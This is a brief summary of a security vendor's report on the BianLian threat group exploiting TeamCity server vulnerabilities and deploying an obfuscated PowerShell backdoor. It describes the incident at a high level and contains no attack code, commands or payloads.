Summary
This article describes a recent incident involving the BianLian threat group. BianLian compromised a victim’s network by exploiting a vulnerability in a TeamCity server and deployed a PowerShell backdoor. Researchers at GuidePoint were able to analyze the backdoor and attribute it to BianLian with high confidence.
Highlights
- BianLian exploited vulnerabilities (CVE-2024-27198 / CVE-2023-42793) in a TeamCity server to gain initial access.
- After gaining access, they used legitimate tools (winpty-agent.exe and winpty.dll) to pivot to build servers on the victim’s network.
- They deployed a malicious PowerShell script (web.ps1) that functioned as a backdoor.
- The backdoor used an encrypted channel to communicate with the BianLian command and control server.
- Researchers were able to de-obfuscate and analyze the backdoor script.
- The backdoor leveraged techniques such as asynchronous execution and certificate validation to enhance stealth.
- BianLian’s use of a PowerShell backdoor aligns with their ability to adapt to changing security landscapes.
https://www.guidepointsecurity.com/blog/bianlian-gos-for-powershell-after-teamcity-exploitation/